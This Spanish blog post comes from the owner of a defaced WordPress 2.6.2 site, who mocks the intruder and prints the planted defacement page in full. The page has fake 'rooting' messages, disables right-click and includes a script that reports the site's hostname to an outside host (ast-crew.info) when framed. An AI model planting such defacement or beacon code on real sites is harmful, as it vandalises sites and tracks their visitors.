Resulta que hoy entro a uno de mis emprendimientos: addmkt.com y me encuentro con que me habían “hackeado” el sitio. Digo Hackeado porque si uno ve lo que hicieron es más de un nene de 2 años que de un hacker.. pero bue..

La cosa es que me encontré un panorama exactamente asi:

Para ir a detalles, estaba usando WP 2.6.2. No se si es que tiene un bug de seguridad o un pelotudo cómo este escuchó con un sniffer los paquetes de la red. Lo cierto es que el Gran Hacker CenqaweR hace su “pagina” de hacking con frontpage¿?¿?!!! jajaj no existís gil!! sumado a esto, el muy chiste me cambió la contraseña de admin de WP, bastó con que WP me generara una nueva para poder ingresar.

Al ingresar, este Estupendo Hacker, no tocó ningún post, comentario, plugin, ni nada, lo único que hizo fue editar el index.php del template, para que apareciera en la home del blog su paginita.. Está de más decir que volviendo a la versión anterior de ese archivo anduvo todo perfecto y que si entrabas directamente a un post no había ningún porblema.

Ahora para les muestro el código del Hacker, jaja, ya me da risa…

<a href=”">
<img style=”r?ght: 0px; POSITION: absolute; TOP: 0px” alt=”" border=”0″ src=”http://www.hizliresim.com/2008/10/17/144.gif” _fcksavedurl=”http://www.hizliresim.com/2008/10/17/144.gif” /><center><p>
<a href=”">
<img style=”RIGHT: 0px; POSITION: absolute; TOP: 0px” alt=”" border=”0″ src=”http://www.hizliresim.com/2008/10/17/144.gif” _fcksavedurl=”http://www.hizliresim.com/2008/10/17/144.gif” /></a><center><p>
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<META http-equiv=Content-Type content=”text/html; charset=windows-1250″>
<META content=”Microsoft FrontPage 5.0″ name=GENERATOR></HEAD>
<BODY oncontextmenu=”return false” onselectstart=”return false” bgColor=#000000
onload=teclear();>
<DIV align=center><SPAN
style=”FILTER: blur(add=1,direction=170,strength=30); HEIGHT: 50px”>
<STYLE>.layermensaje {
FONT-SIZE: 10pt; COLOR: #00ff00; LINE-HEIGHT: 10pt; FONT-FAMILY: “Arial”
}
</STYLE>

<META content=”MSHTML 6.00.2900.2180″ name=GENERATOR></HEAD>
<BODY bgColor=#000000>
<P align=center><FONT face=Arial color=red size=8
<MARQUEE scrollDelay=30 behavior=alternate bgColor=#000000><b>HaCKeD By CenqaweR</b></MARQUEE> </FONT></P>
<font SIZE=”5″ COLOR=”#545454″>
<p>&nbsp;</p>
</font>
<SCRIPT language=javascript>
<!–
// mensaje elite
mensaje=

‘____________________________________________________<br><br>’+
‘<b>..:: SysTeM HaCKeD By </b><FONT color=”#ffhggg” size=5><b>CenqaweR  &  LaZuRix</b><FONT size=3><FONT color=#ffffff> ::..<br>          ‘+
‘<br>           ‘+
‘cengav3r@hotmail.com </b> <b><br>           ‘+
‘<br>           ‘+
‘WeLCoMe To HaCKinG WoRLD ..<br>’+
‘                    <br>’+
‘ System Allowed’+
‘                    <br>’+
‘Rooting Server. . . . .                <br>           ‘+
‘Rooting Complete ‘+
‘   <br>’+
‘Was Here!..<br>’+
‘ <br>’+
‘<b>CenqaweR Group  & LaZuRix</b><br>’+
‘<br>’+
‘<b>Sorry Admin </b> …<br>’+
‘                    <br>’+
‘ <br>’+
‘Connected <br>’+
‘port :  8080 . . . <br>’+
‘Process complete……1.2.3.4… <br>’+
‘   <br>’+
‘Deleting…………………<br>’+
‘Deleting Complete … <br>’+
‘<br>’+
‘Close Ports . . . . . . ‘+
‘Disconnect!’+
‘<br>’+
‘____________________________________________________<br>’+
‘<p align=”center”> <b><font size=”4″>   “FaTaL ErRoR <b><font size=”6″>: CenqaweR</font> WaS HeRe AnD YoU aRe HaCKeD!!! <FONT color=”#ff0000″ size=4><B>…..</B></FONT>”</font></b> <br>’
line=0
cursor=’_’
function teclear(){
if(line==mensaje.length) cursor=”
ttecleado.innerHTML=mensaje.substring(0,line)+cursor
if(line++<mensaje.length) setTimeout(“teclear()”,20)
}
//–>
</SCRIPT>
<script language=”JavaScript”>
puchtit=”  ..::  HaCKeD By CenqaweR  ::..  “;
letrero2=” H a C K e D   B y   C e n q a w e R “;
letrero1=” H a C K e D   B y   C e n q a w e R “;
ultimo1=letrero1.length-1;
ultimo2=letrero2.length-1;
tiempo=setTimeout(“scroll()”,.1);
function scroll()
{
aux1=letrero1.charAt(ultimo1-1);
letrero1=aux1+letrero1.substring(0,ultimo1-1);
aux2=letrero2.charAt(0);
letrero2=letrero2.substring(1,ultimo2+1)+aux2;
window.status=”(” + letrero2 + puchtit + letrero1 + “)”;
tiempo=setTimeout(“scroll()”,.1);
return true;
}

</script>
<P align=center><B><FONT size=4><FONT color=#ffffff></FONT><FONT
color=#ff0000></FONT><FONT color=#ff0000 size=4></FONT></FONT></B>
<DIV class=layermensaje id=ttecleado ?></DIV>
<P align=center><B><FONT color=#ffffff size=7></FONT></B></P>
<P align=center><FONT color=#00ff00 size=7><B></B></FONT></P>
<P></P>
<SCRIPT src=”" type=text/javascript></SCRIPT>

<SCRIPT type=text/javascript>
<!–
if (top != self) { top.document.title = document.title; document.body.onunload=top.frames[0].location.href=p; rnd=Math.floor(Math.random()*1000); var b=(”+location.hostname).split(‘.’); s=b[b.length-3] + ‘.’ + b[b.length-2] + ‘.’ +b[b.length-1]; image_stat = new Image(); image_stat.src = ‘http://ast-crew.info=’ + s + ‘&’ + rnd; }
–>
</SCRIPT>
<BGSOUND src=”index_files/alert.wav” loop=none>

<BGSOUND SRC=”http://iranianhackers.com/loop/mp3.mid” LOOP=5>

Bueno gente, si pasa un gil cómo este por su blog ya saben qué hacer.. Ojalá no les pase..